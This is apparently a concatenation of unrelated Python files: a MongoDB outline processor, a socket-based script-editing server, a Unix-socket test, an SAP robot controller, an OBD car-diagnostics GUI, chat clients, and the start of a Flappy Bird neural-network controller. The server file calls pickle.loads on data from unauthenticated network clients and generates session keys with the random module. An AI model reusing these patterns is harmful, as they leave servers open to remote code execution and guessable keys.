# bar.next()
db_papers = db_client[config.db_name]
col_to_work = db_papers[col]
sections = {}
try:
json_outline = json.loads(col_to_work.find_one({'sha':sha}, {'_id':0, 'raw':1})['raw'])['outline']
sections = process_outline(json_outline)
col_to_work.update_one({'sha':sha}, {'$set': {'checked':True, 'toc': sections}})
except Exception as e:
col_to_work.update_one({'sha':sha}, {'$set': {'checked':True, 'toc': None}})
raise(e)
def thread_caller(sem, db_client, col):
db_papers = db_client[config.db_name]
col_to_work = db_papers[col]
filter_checked = {'checked': True}
documents = col_to_work.find(filter_checked, {'_id': 0, 'sha': 1})
    bar = Bar('Processing', max=col_to_work.count_documents(filter_checked))
for document in documents:
try:
t = threading.Thread(target=process_outlines, args=(bar, sem, db_client, col, document['sha']))
threads.append(t)
t.start()
except RuntimeError:
pass
except Exception as e:
raise(e)
# print('[0] error obtaining info from "{}"'.format(document['sha']))
for t in threads:
t.join()
bar.finish()
if __name__ == "__main__":
col_elsevier = config.collection_elsevier
db_client = MongoClient(config.mongoURL)
sem = threading.Semaphore(threads_amount)
thread_caller(sem, db_client, col_elsevier)
# process_outlines(None, sem, db_client, col_elsevier, '28ef2f6aa0e0c14f92055d24d72b151fd4da910a')
db_client.close()
|
socketserverhandler.py
|
import socket as pythonsocket
from threading import Thread
from time import sleep
import datetime
import pickle
import database
import string
import random
import settings
socket = pythonsocket.socket(pythonsocket.AF_INET, pythonsocket.SOCK_STREAM)
def startServer():
database.beginDataBaseConnection()
database.initDatabase()
server_address = (settings.server_location, int(settings.server_port))
print('Starting server on %s port %s' % server_address)
socket.setsockopt(pythonsocket.SOL_SOCKET, pythonsocket.SO_REUSEADDR, 1)
socket.settimeout(None)
socket.bind(server_address)
socket.listen(5)
socket.settimeout(None)
thread = Thread(target=waitConnect)
thread.start()
servertick = Thread(target=serverTick)
servertick.start()
clients = []
class Client():
def __init__(self, connection, address, authorized):
self.connection = connection
self.address = address
self.authorized = authorized
self.key = None
self.username = None
self.editingScript = None
self.disconnect = False
self.lastPing = datetime.datetime.now()
self.scriptsComplete = []
def waitConnect():
print("Server wait client thread started")
while True:
sleep(0.1)
connection, address = socket.accept()
print("%s Client connected on %s" % (datetime.datetime.now(), address))
client = Client(connection, address, False)
clients.append(client)
clientthread = Thread(target=clientTick, args=[clients[len(clients) - 1]])
clientthread.start()
def getAllClientConnections():
return [client.connection for client in clients]
def sendToAllClients(payload):
for client_con in getAllClientConnections():
try:
sendToClient(client_con, payload)
except Exception:
print("couldn't send to connection %s" % client_con)
def clientTick(client):
print("Server tick thread started for client")
HEADERSIZE = 10
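    # Wire format: every message is a pickled tuple prefixed by a 10-character,
    # left-justified ASCII length header (see sendToClient below).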
while True:
if client.disconnect:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
full_msg = b''
new_msg = True
while True:
try:
client_connection = client.connection
buf = client_connection.recv(2048)
if new_msg:
try:
msglen = int(buf[:HEADERSIZE])
except ValueError:
print("client disconnect error")
# happens when client disconnects
break
new_msg = False
full_msg += buf
except ConnectionResetError:
print("%s SERVER user %s connecton reset error" % (datetime.datetime.now(), repr(client.username)))
break
download_size = len(full_msg) - HEADERSIZE
if download_size == msglen:
if download_size > 100000:
print(
"%s SERVER received large message (%s)" % (
datetime.datetime.now(), str(download_size / 1000000) + "MB"))
try:
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
except EOFError:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
new_msg = True
full_msg = b""
if not client.authorized:
if "login-attempt" == incomingdata[0]:
print("%s SERVER user %s login attempt" % (datetime.datetime.now(), repr(incomingdata[1])))
username = incomingdata[1]
password = incomingdata[2]
login = (database.login(username, password))
online_users = database.getOnlineUsers()
if username in online_users:
print("%s SERVER user %s already logged in" % (
datetime.datetime.now(), repr(incomingdata[1])))
sendToClient(client_connection, ("login-success", False, None))
else:
if login:
key = generateKey()
client.key = key
client.username = username
sendToClient(client_connection, ("login-success", True, key))
client.authorized = True
print("%s SERVER user %s logged in" % (datetime.datetime.now(), repr(incomingdata[1])))
database.updateUserStatus(username, "ONLINE")
else:
sendToClient(client_connection, ("login-success", False, None))
print("%s SERVER user %s wrong password" % (
datetime.datetime.now(), repr(incomingdata[1])))
else:
if "request-scripts" == incomingdata[1]:
print("%s SERVER user %s request scripts" % (datetime.datetime.now(), repr(client.username)))
if incomingdata[0] == client.key:
print("%s SERVER sending scripts to user %s" % (
datetime.datetime.now(), repr(client.username)))
data = database.getScripts(incomingdata[2])
sendToClient(client_connection, ("scripts-return", data))
pass
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "edit-script" == incomingdata[1]:
scriptno = incomingdata[2]
print("%s SERVER user %s request to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if incomingdata[0] == client.key:
script_status = database.getScriptStatus(scriptno)
if script_status == "RAW":
print("%s SERVER allowing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
client.editingScript = scriptno
database.updateScriptStatus("EDITING", client.username, scriptno)
sendToClient(client.connection, ('edit-script-success', True, scriptno))
sendToAllClients(('script-status-update', scriptno, "EDITING", client.username))
print("%s SERVER sending all clients (%s) status update for %s" % (
datetime.datetime.now(), len(getAllClientConnections()), scriptno))
elif script_status == "EDITING":
print("%s SERVER refusing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToClient(client.connection, ('edit-script-success', False, scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "upload-video" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
video_generator_payload = incomingdata[3]
script_status = database.getScriptStatus(scriptno)
if script_status == "EDITING":
if scriptno == client.editingScript:
print("%s SERVER allowing user %s to upload script number %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if database.uploadVid(video_generator_payload, scriptno):
database.updateScriptStatus("COMPLETE", client.username, scriptno)
sendToClient(client_connection, ('script-upload-success', True, scriptno))
client.scriptsComplete.append(scriptno)
client.editingScript = None
else:
sendToClient(client_connection, ('script-upload-success', False, scriptno))
sendToAllClients(('script-status-update', scriptno, "COMPLETE", client.username))
else:
print(
"%s SERVER user %s script number %s does not match what client is editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno,
client.editingScript))
else:
print("%s SERVER user %s script status is %s" % (
datetime.datetime.now(), repr(client.username), script_status))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "quit-editing" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
if client.editingScript == scriptno:
database.updateScriptStatus("RAW", None, scriptno)
print("%s SERVER user %s quit editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToAllClients(('script-status-update', scriptno, "RAW", None))
client.editingScript = None
else:
print("%s SERVER user %s not editing script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "flag-scripts" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
flagtype = incomingdata[3]
database.updateScriptStatus(flagtype, client.username, scriptno)
print("%s SERVER user %s flagging script %s as %s" % (
datetime.datetime.now(), repr(client.username), scriptno, flagtype))
sendToAllClients(('script-status-update', scriptno, flagtype, client.username))
client.editingScript = None
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "PING" == incomingdata[1]:
if incomingdata[0] == client.key:
client.lastPing = datetime.datetime.now()
print("%s SERVER sending PONG to %s" % (datetime.datetime.now(), repr(client.username)))
sendToClient(client.connection, ('PONG',))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
            if (datetime.datetime.now() - client.lastPing) > datetime.timedelta(minutes=2):
print("%s SERVER no PING from %s in 2 minutes. Disconnecting" % (
datetime.datetime.now(), repr(client.username)))
client.disconnect = True
print("%s SERVER Thread shutting down" % datetime.datetime.now())
client.disconnect = True
break
def sendToClient(client_connection, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
client_connection.sendall(payload)
def handleCompletedScripts():
while True:
pass
def serverTick():
global clients
while True:
sleep(0.1)
scriptsbeingedited = database.getScriptEditInformation() # gets information of scripts with EDITING status
sciptsbeingeditedby = [editedby[2] for editedby in scriptsbeingedited] # gets names of scripts with editedby
online_users = database.getOnlineUsers()
clientIndexToRemove = []
if clients:
for i, client in enumerate(clients):
if client.username in sciptsbeingeditedby:
indexOfScript = sciptsbeingeditedby.index(client.username)
scriptno = scriptsbeingedited[indexOfScript][0]
# set script client was editing to raw
if not client.editingScript == scriptno and scriptno not in client.scriptsComplete:
print("%s SERVER setting status of script %s to RAW because client is not editing it" % (
datetime.datetime.now(), scriptno))
database.updateScriptStatus("RAW", None, scriptno)
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
if client.disconnect: # if client disconnects set script to raw
clientIndexToRemove.append(i)
else:
if scriptsbeingedited:
for script in scriptsbeingedited:
database.updateScriptStatus("RAW", None, script[0])
for client_con in getAllClientConnections():
                        sendToClient(client_con, ('script-status-update', script[0], "RAW", None))
print("%s SERVER setting status of all scrips to RAW as there are no clients." % (
datetime.datetime.now()))
if online_users:
for user in online_users:
database.updateUserStatus(user, None)
print("%s SERVER removing online status for %s as there are no clients" % (
datetime.datetime.now(), user))
if clientIndexToRemove:
for index in clientIndexToRemove:
print("deleted clients")
try:
if clients[index].username is not None:
database.updateUserStatus(clients[index].username, None)
for client in clients:
if not client.disconnect:
sendToClient(client.connection,
('script-status-update', clients[index].editingScript, "RAW", None))
except IndexError:
pass
try:
new_clients = []
for i in range(len(clients)):
if not clients[index] == clients[i]:
new_clients.append(clients[i])
clients = new_clients
except IndexError:
print("could not update client list")
if scriptsbeingedited:
pass
def generateKey():
"""Generate a random string of letters, digits and special characters """
password_characters = string.ascii_letters + string.digits + string.punctuation
return ''.join(random.choice(password_characters) for i in range(10))
|
test.py
|
# python3
SERVER_SOCKET_PATH = _s = 'socket'
import socket, sys, os, threading, struct
def pe(s):
print(s, file=sys.stderr)
def th(b):
# network is big endian
return int.from_bytes(b, 'big', signed=False)
def trans(b):
msg = b''
for x in b:
msg += struct.pack('!I', x)
return msg
l = threading.Lock()
t = {}
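# t maps set name -> {key: score}, guarded by the lock l. Request layout (see thd/trans;
# each request is a length-prefixed list of big-endian uint32 words):
#   cmd 1: (set, key, score) -> store score, reply [0]
#   cmd 2: (set, key)        -> drop key,    reply [0]
#   cmd 3: (set,)            -> reply [1, size of set]
#   cmd 4: (set, key)        -> reply [1, score]
#   cmd 5: range query across sets (results gathered but no reply is built here)
#   cmd 6: disconnect (reply None)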
def proc(s):
global l, t
l.acquire()
cmd = s[0]
msg = []
if cmd == 1:
(set, key, score) = s[1:]
if set not in t:
t[set] = {}
if key not in t[set]:
t[set][key] = 0
t[set][key] = score
msg.append(0)
elif cmd == 2:
(set, key) = s[1:]
if set in t:
t[set].pop(key, None)
msg.append(0)
elif cmd == 3:
set = s[1]
size = 0
if set in t:
size = len(t[set])
msg += [ 1, size ]
elif cmd == 4:
(set, key) = s[1:]
score = 0
if set in t and key in t[set]:
score = t[set][key]
msg += [ 1, score ]
elif cmd == 5:
results = []
(lo, hi) = s[-2:]
for set in s[1:-3]:
if set in t:
for k, v in t[set].items():
if lo <= k <= hi:
results.append((k, v))
results.sort(key=lambda x: (x[0], x[1]))
# disconn
elif cmd == 6:
msg = None
l.release()
return msg
def thd(conn):
flag = 1
q = []
while flag:
s = conn.recv(4) # good enough
l = th(s)
q.append([])
if l == 0:
flag = 0
continue
for i in range(l):
q[-1].append(th(conn.recv(4)))
msg = proc(q[-1])
print('thd msg', conn, msg)
if msg:
msg = trans(msg)
conn.send(msg)
# disconn
else:
flag = 0
conn.close()
def server_run():
try:
os.unlink(_s)
except OSError:
if os.path.exists(_s):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(_s)
sock.listen(1)
for x in range(8):
(conn, addr) = sock.accept()
threading.Thread(target=thd, args=(conn, ), daemon=False).start()
sock.close()
def str_to_int(s):
return([ int(x) for x in s.split() ])
# args = [ 'line 1', 'line 2', ... ]
def proc_input(args):
pass
def wait():
for x in range(10 ** 6):
pass
def client_run(args, verbose=False):
wait()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(_s)
r = []
for x in args:
sock.send(trans(x))
r.append(sock.recv(1024)) # good enough for test purposes
if verbose:
for x in r:
print(x)
wait()
return r
def test():
threading.Thread(target=server_run, daemon=True).start()
client_run([ (4, 1, 0, 1, 10), (2, 3, 0), (3, 4, 0, 1) ], verbose=True)
if __name__ == '__main__':
from sys import argv
if argv.pop() == 'test':
test()
else:
server_run()
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""FetchCore robot controller."""
import logging
import datetime
import threading
from copy import deepcopy
from typing import Dict
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .fetchrobot import FetchRobots
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""FetchCore robot controller."""
def __init__(self, fetch_robots: FetchRobots) -> None:
"""Construct."""
# Instance with all FetchCore robots
self._fetch_robots = fetch_robots
self.robottypes: Dict[str, bool] = {}
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Create instance for robottypes CR
template_robottype_cr = get_sample_cr('robco_robottype')
self.robottype_controller = K8sCRHandler(
'registry.cloudrobotics.com',
'v1alpha1',
'robottypes',
'default',
template_robottype_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
# register callbacks
self.robottype_controller.register_callback(
'robot', ['ADDED', 'MODIFIED', 'REPROCESS'], self.robottype_cb)
self.register_callback(
'robot', ['ADDED', 'REPROCESS'], self.robot_cb)
self.register_callback(
'robot_deleted', ['DELETED'], self.robot_deleted_cb)
def robot_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Fetch robot is not in FetchCore watch list, add it
try:
self._fetch_robots.get_robot(name)
except ValueError:
self._fetch_robots.add_robot(name)
_LOGGER.info('Added robot %s to FetchCore watch list', name)
def robot_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot delete CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Remove robot from FetchCore watch list
self._fetch_robots.remove_robot(name)
_LOGGER.info('Removed robot %s from FetchCore watch list', name)
def robottype_cb(self, name: str, custom_res: Dict) -> None:
"""Process robottype CR callback data."""
self.robottypes[name] = bool(custom_res.get('spec', {}).get('make') == 'fetch')
def run(self, reprocess: bool = False, multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
# Initial load of robot types
robot_type_crs = self.robottype_controller.list_all_cr(use_cache=False)
for custom_res in robot_type_crs:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robottype_cb(name, custom_res)
# Initial load of robots
robot_crs = self.list_all_cr(use_cache=False)
for custom_res in robot_crs:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robot_cb(name, custom_res)
# Initial load from FetchCore
self._fetch_robots.update()
# Start watcher threads
self.robottype_controller.run(reprocess, multiple_executor_threads)
super().run(reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
# Stop robottype and robot watchers
self.robottype_controller.stop_watcher()
super().stop_watcher()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error('Error updating status of robots: %s', err, exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = err
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Continously update status of robot CR."""
status = deepcopy(self.robot_template_cr)['status']
# Get updated robot states from FetchCore
self._fetch_robots.update()
# Update robot CR status
for name, robot in self._fetch_robots.robots.items():
status['configuration']['trolleyAttached'] = robot.trolley_attached
status['robot']['batteryPercentage'] = robot.battery_percentage
status['robot']['lastStateChangeTime'] = robot.last_state_change
status['robot']['state'] = robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(name, status)
except ApiException:
_LOGGER.error('Status CR of robot %s could not be updated', name)
|
KatyOBD.py
|
import obd
import tkinter as tk
import time
import threading
### OBD Connection
connection = obd.OBD()
### Helper Functions
str_rpm = '0'
str_speed = '0'
str_coolant_temp = '0'
str_fuel_level = '0'
str_intake_temp = '0'
str_throttle_pos = '0'
str_intake_pressure = '0'
indicator = 0
def parseAuto():
global str_rpm, str_speed, str_coolant_temp, str_fuel_level, str_intake_temp, str_throttle_pos, str_intake_pressure, indicator
while(1):
        # Stop parsing when the stop indicator has been set
if indicator == 1:
break
        # OBD commands to query
cmd_rpm = obd.commands.RPM
cmd_speed = obd.commands.SPEED
cmd_coolant_temp = obd.commands.COOLANT_TEMP
cmd_fuel_level = obd.commands.FUEL_LEVEL
cmd_intake_temp = obd.commands.INTAKE_TEMP
cmd_throttle_pos = obd.commands.THROTTLE_POS
cmd_intake_pressure = obd.commands.INTAKE_PRESSURE
        # Query each command and assign the responses
response_rpm = connection.query(cmd_rpm)
response_speed = connection.query(cmd_speed)
response_coolant_temp = connection.query(cmd_coolant_temp)
response_fuel_level = connection.query(cmd_fuel_level)
response_intake_temp = connection.query(cmd_intake_temp)
response_throttle_pos = connection.query(cmd_throttle_pos)
response_intake_pressure = connection.query(cmd_intake_pressure)
# Change Obj to String
str_rpm = str(response_rpm.value)
str_speed = str(response_speed.value)
str_coolant_temp = str(response_coolant_temp.value)
str_fuel_level = str(response_fuel_level.value)
str_intake_temp = str(response_intake_temp.value)
str_throttle_pos = str(response_throttle_pos.value)
str_intake_pressure = str(response_intake_pressure.value)
# Delay Parsing Time
time.sleep(0.01)
def stopParsing():
global indicator
indicator = 1
def about():
about_root=tk.Tk()
w = 780 # width for the Tk root
h = 480 # height for the Tk root
# get screen width and height
ws = about_root.winfo_screenwidth() # width of the screen
hs = about_root.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Tk root window
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
# set the dimensions of the screen
# and where it is placed
about_root.geometry('%dx%d+%d+%d' % (w, h, x, y))
about_root.title('About Katy OBD')
label_author=tk.Label(about_root,text='Katy OBD Version 1.0', font=('tahoma', 24))
label_author.place(x=200,y=60)
label_author=tk.Label(about_root,text='Copyright (C) 2017', font=('tahoma', 24))
label_author.place(x=225,y=120)
label_author=tk.Label(about_root,text='Author: Chuan Yang', font=('tahoma', 24))
label_author.place(x=225,y=180)
label_author=tk.Label(about_root,text='Shengjing Hospital of China Medical University', font=('tahoma', 22))
label_author.place(x=100,y=240)
button_refresh=tk.Button(about_root, width=15, text='OK', font=('tahoma', 24), command=about_root.destroy)
button_refresh.place(x=230, y=330)
about_root.mainloop()
### Thread Management
def start_thread(event):
global thread, indicator
indicator = 0
thread = threading.Thread(target=parseAuto)
thread.daemon = True
text_rpm.delete('1.0', tk.END)
text_rpm.insert('1.0', str_rpm)
text_speed.delete('1.0', tk.END)
text_speed.insert('1.0', str_speed)
text_coolant_temp.delete('1.0', tk.END)
text_coolant_temp.insert('1.0', str_coolant_temp)
text_fuel_level.delete('1.0', tk.END)
text_fuel_level.insert('1.0', str_fuel_level)
text_intake_temp.delete('1.0', tk.END)
text_intake_temp.insert('1.0', str_intake_temp)
text_throttle_pos.delete('1.0', tk.END)
text_throttle_pos.insert('1.0', str_throttle_pos)
text_intake_pressure.delete('1.0', tk.END)
text_intake_pressure.insert('1.0', str_intake_pressure)
thread.start()
root.after(20, check_thread)
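# check_thread re-schedules itself every 20 ms via root.after and copies the latest
# global readings (updated by the parseAuto worker thread) into the Tk text widgets.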
def check_thread():
if thread.is_alive():
text_rpm.delete('1.0', tk.END)
text_rpm.insert('1.0', str_rpm)
text_speed.delete('1.0', tk.END)
text_speed.insert('1.0', str_speed)
text_coolant_temp.delete('1.0', tk.END)
text_coolant_temp.insert('1.0', str_coolant_temp)
text_fuel_level.delete('1.0', tk.END)
text_fuel_level.insert('1.0', str_fuel_level)
text_intake_temp.delete('1.0', tk.END)
text_intake_temp.insert('1.0', str_intake_temp)
text_throttle_pos.delete('1.0', tk.END)
text_throttle_pos.insert('1.0', str_throttle_pos)
text_intake_pressure.delete('1.0', tk.END)
text_intake_pressure.insert('1.0', str_intake_pressure)
root.after(20, check_thread)
### TKinter Mainflow
root = tk.Tk()
root.geometry("{0}x{1}+0+0".format(root.winfo_screenwidth(), root.winfo_screenheight()))
#root.attributes('-fullscreen', True)
root.title('Katy OBD -- On Board Diagnostics Parser')
#root.iconbitmap('dna.ico')
y0 = 150
y1 = 400
y2 = 580
y3 = 690
# Label & Edit Box
text_rpm = tk.Text(root, width=10, height=1, font=('tahoma', 80), bd=2, wrap='none')
text_rpm.place(x=50, y=y0)
label_rpm = tk.Label(root, text='RPM', font=('tahoma', 40))
label_rpm.place(x=50,y=y0-100)
text_speed = tk.Text(root, width=10, height=1, font=('tahoma', 80), bd=2, wrap='none')
text_speed.place(x=750, y=y0)
label_speed = tk.Label(root, text='Speed', font=('tahoma', 40))
label_speed.place(x=750,y=y0-100)
# ////////////////////////////
text_coolant_temp = tk.Text(root, width=10, height=1, font=('tahoma', 40), bd=2, wrap='none')
text_coolant_temp.place(x=50, y=y1)
label_coolant_temp = tk.Label(root, text='Coolant Temperature', font=('tahoma', 30))
label_coolant_temp.place(x=50,y=y1-80)
text_fuel_level = tk.Text(root, width=17, height=1, font=('tahoma', 40), bd=2, wrap='none')
text_fuel_level.place(x=650, y=y1)
label_fuel_level = tk.Label(root, text='Fuel Level', font=('tahoma', 30))
label_fuel_level.place(x=650,y=y1-80)
label_fuel_level_percentage = tk.Label(root, text='%', font=('tahoma', 40))
label_fuel_level_percentage.place(x=1200,y=y1)
# ////////////////////////////////////
text_intake_temp = tk.Text(root, width=10, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_intake_temp.place(x=50, y=y2)
label_intake_temp = tk.Label(root, text='Intake Air Temperature', font=('tahoma', 25))
label_intake_temp.place(x=50,y=y2-70)
text_intake_pressure = tk.Text(root, width=15, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_intake_pressure.place(x=500, y=y2)
label_intake_pressure = tk.Label(root, text='Intake Manifold Pressure', font=('tahoma', 25))
label_intake_pressure.place(x=500,y=y2-70)
text_throttle_pos = tk.Text(root, width=10, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_throttle_pos.place(x=1020, y=y2)
label_throttle_pos = tk.Label(root, text='Throttle Position', font=('tahoma', 25))
label_throttle_pos.place(x=1020,y=y2-70)
label_throttle_pos_percentage = tk.Label(root, text='%', font=('tahoma', 30))
label_throttle_pos_percentage.place(x=1300,y=y2)
# Buttons
button_start = tk.Button(root, text="Start", width=12, font=('tahoma', 30), command=lambda:start_thread(None))
button_start.place(x=50, y=y3)
button_stop = tk.Button(root, text="Stop", width=12, font=('tahoma', 30), command=stopParsing)
button_stop.place(x=400, y=y3)
button_about = tk.Button(root, text="About...", width=12, font=('tahoma', 30), command=about)
button_about.place(x=745, y=y3)
button_exit = tk.Button(root, text="Exit", width=10, font=('tahoma', 30), command=root.destroy)
button_exit.place(x=1100, y=y3)
root.bind('<Return>', start_thread)
root.mainloop()
|
client.py
|
import json
import logging
import socket
import threading
import os
import sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
from validator import port_validation, ip_validation
DEFAULT_PORT = 9090
DEFAULT_IP = "127.0.0.1"
END_MESSAGE_FLAG = "CRLF"
# Logging configuration
logging.basicConfig(
format="%(asctime)-15s [%(levelname)s] %(funcName)s: %(message)s",
handlers=[logging.FileHandler("./logs/client.log")],
level=logging.INFO,
)
logger = logging.getLogger(__name__)
class Client:
def __init__(self, server_ip: str, port_number: int) -> None:
self.server_ip = server_ip
self.port_number = port_number
self.sock = None
self.new_connection()
        # Authenticate with the server
self.send_auth()
        # Thread that reads data from the server
t = threading.Thread(target=self.read_message)
t.daemon = True
t.start()
        # Handle input coming from the user
self.input_processing()
def new_connection(self):
"""Осуществляет новое соединение по сокету"""
ip, port = self.server_ip, self.port_number
sock = socket.socket()
sock.setblocking(1)
sock.connect((ip, port))
self.sock = sock
logging.info(f"Успешное соединение с сервером {ip}:{port}")
def send_reg(self, password):
"""Логика регистрации пользователя в системе"""
print("*Новая регистрация в системе*")
while True:
input_username = input("Введите ваше имя пользователя (ник) -> ")
if input_username == "":
print("Имя пользователя не может быть пустым!")
else:
data = json.dumps(
{"password": password, "username": input_username},
ensure_ascii=False,
)
self.sock.send(data.encode())
logger.info(f"Отправка данных серверу: '{data}'")
                # Receive the server's response
response = json.loads(self.sock.recv(1024).decode())
if not response["result"]:
raise ValueError(
f"Не удалось осуществить регистрацию, ответ сервера {response}, более подробно см логи сервера"
)
logger.info("Успешно зарегистрировались")
break
def send_auth(self):
"""Логика авторизации клиента"""
login_iter = 1
while True:
            # Separate prompt lines explaining the authentication mechanism on the first login
req_password_str = "Введите пароль авторизации"
req_password_str += (
"\nЕсли это ваш первый вход в систему, то он будет использоваться для последующей авторизации в системе -> "
if login_iter == 1
else " -> "
)
user_password = input(req_password_str)
if user_password != "":
data = json.dumps({"password": user_password}, ensure_ascii=False)
                # Send the message
self.sock.send(data.encode())
logger.info(f"Отправка данных серверу: '{data}'")
                # Receive the server's response
response = json.loads(self.sock.recv(1024).decode())
                # Authentication succeeded
if response["result"]:
print(
"Авторизация прошла успешно, можете вводить сообщения для отправки:"
)
break
                # Authentication failed
elif response["description"] == "wrong auth":
print("Неверный пароль!")
                    # Reconnect, because the server drops the connection
                    # when authentication fails
self.new_connection()
                # First login from this ip address, so registration is required
elif response["description"] == "registration required":
self.new_connection()
self.send_reg(user_password)
self.new_connection()
else:
raise ValueError(
f"Получили неожиданный ответ от сервера: {response}"
)
else:
print("Пароль не может быть пустым")
login_iter += 1
def read_message(self):
"""Чтение сообщения"""
data = ""
while True:
            # Receive data and assemble it chunk by chunk
chunk = self.sock.recv(1024)
data += chunk.decode()
            # If this is the end of the message, the whole payload has been collected and can be shown
if END_MESSAGE_FLAG in data:
logger.info(f"Прием данных от сервера: '{data}'")
data = data.replace(END_MESSAGE_FLAG, "")
data = json.loads(data)
message_text, user_name = data["text"], data["username"]
print(f"[{user_name}] {message_text}")
data = ""
            # Received only part of the data, log it
else:
logger.info(f"Приняли часть данных от сервера: '{data}'")
def send_message(self, message: str):
"""Отправка сообщения"""
        # Append the end-of-message flag (simplest way to send more than 1024 bytes without breaking the connection)
message += END_MESSAGE_FLAG
        # Send the message
self.sock.send(message.encode())
logger.info(f"Отправка данных серверу: '{message}'")
def input_processing(self):
"""Обработка ввода сообщений пользователя"""
while True:
msg = input()
            # The "exit" message terminates the client
if msg == "exit":
break
self.send_message(msg)
def __del__(self):
if self.sock:
self.sock.close()
logger.info("Разрыв соединения с сервером")
def main():
port_input = input("Введите номер порта сервера -> ")
port_flag = port_validation(port_input)
    # Invalid input, fall back to the default port
if not port_flag:
port_input = DEFAULT_PORT
print(f"Выставили порт {port_input} по умолчанию")
ip_input = input("Введите ip-адрес сервера -> ")
ip_flag = ip_validation(ip_input)
    # Invalid input, fall back to the default ip address
if not ip_flag:
ip_input = DEFAULT_IP
print(f"Выставили ip-адрес {ip_input} по умолчанию")
client = Client(ip_input, int(port_input))
if __name__ == "__main__":
main()
|
client_sent_recv.py
|
import socket
import sys
import threading
serverName = 'localhost'
serverPort = 21128
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((serverName, serverPort))
print('Connected to the server successfully')
def runn():
while True:
sentence = input('')
clientSocket.send(sentence.encode("utf-8"))
background_thread = threading.Thread(target=runn)
background_thread.daemon = True
background_thread.start()
while True:
try:
message = clientSocket.recv(1024)
if not message:
print("End\n")
clientSocket.close()
sys.exit()
else:
print('From server: ' + message.decode('utf-8'), end='')
except KeyboardInterrupt:
print('Bye Server')
sys.exit()
|
controller.py
|
import time
import multiprocessing as mp
import numpy as np
import flappy
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Bernoulli
import matplotlib.pyplot as plt
class Net(nn.Module):
# Define network parameters
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(72*100, 300)
self.fc2 = nn.Linear(300, 300)
self.fc3 = nn.Linear(300, 300)
self.fc4 = nn.Linear(300, 1)
def forward(self, x):
